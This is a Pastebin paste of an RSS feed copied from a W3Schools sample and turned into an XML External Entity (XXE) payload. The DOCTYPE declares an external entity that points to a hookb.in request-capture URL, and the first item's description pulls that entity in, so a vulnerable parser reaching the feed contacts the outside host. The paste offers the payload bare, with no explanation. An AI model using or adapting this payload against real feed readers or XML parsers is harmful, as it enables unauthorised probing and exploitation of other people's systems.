Advertisement
Guest User

Untitled

a guest
Jul 20th, 2017
48
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.62 KB | None | 0 0
  1. <?xml version="1.0" encoding="ISO-8859-1"?>
  2. <!DOCTYPE foo [
  3. <!ENTITY xxe SYSTEM "http://hookb.in/Ezg5jkVz?win=yes" >]>
  4. <rss version="2.0">
  5.  
  6. <channel>
  7. <title>W3Schools Home Page</title>
  8. <link>https://www.w3schools.com</link>
  9. <description>Free web building tutorials</description>
  10. <item>
  11. <title>RSS Tutorial</title>
  12. <link>https://www.w3schools.com/xml/xml_rss.asp</link>
  13. <description>&xxe;</description>
  14. </item>
  15. <item>
  16. <title>XML Tutorial</title>
  17. <link>https://www.w3schools.com/xml</link>
  18. <description>New XML tutorial on W3Schools</description>
  19. </item>
  20. </channel>
  21.  
  22. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement